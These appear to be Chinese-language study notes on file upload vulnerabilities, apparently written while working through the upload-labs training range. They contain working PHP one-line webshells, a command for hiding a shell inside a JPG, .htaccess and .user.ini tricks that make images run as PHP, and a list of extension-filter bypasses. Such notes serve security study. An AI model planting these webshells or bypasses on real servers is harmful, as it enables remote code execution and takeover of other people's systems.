文件上传漏洞
文件上传功能:头像更改、发邮件、上传资料

1、利用文件上传功能上传恶意文件:一句话木马文件、反弹shell的exe
2、上传文件的路径可访问
3、上传文件所在的路径具备可执行权限

一句话木马
传参方式:POST GET REQUEST
<?php @eval($_POST['c']);?>
@:防报错
eval() 代码执行函数

<?php @system($_POST['c']);?>

copy a.jpg/b+muma.php/a muma.jpg

文件上传漏洞
直接文件上传

upload-labs:
第一关前端过滤
禁用js
修改后缀
第二关文件类型过滤
黑名单过滤
第三关畸形后缀名--php php3 php4 php5 phtml
第四关.htaccess
<FilesMatch "png">
SetHandler application/x-httpd-php
</FileMatch>
第五关.user.ini
auto_prepend_file=muma.jpg
auto_append_file=muma.jpg
readme.php
第六关大小写绕过
windows特性绕过--目标服务器为Windows服务器
第七关后缀加空格 '.php '-->.php
第八关后缀加. .php. -->.php
第九关后缀加::$DATA
第十关后缀加. .
第十一关双写绕过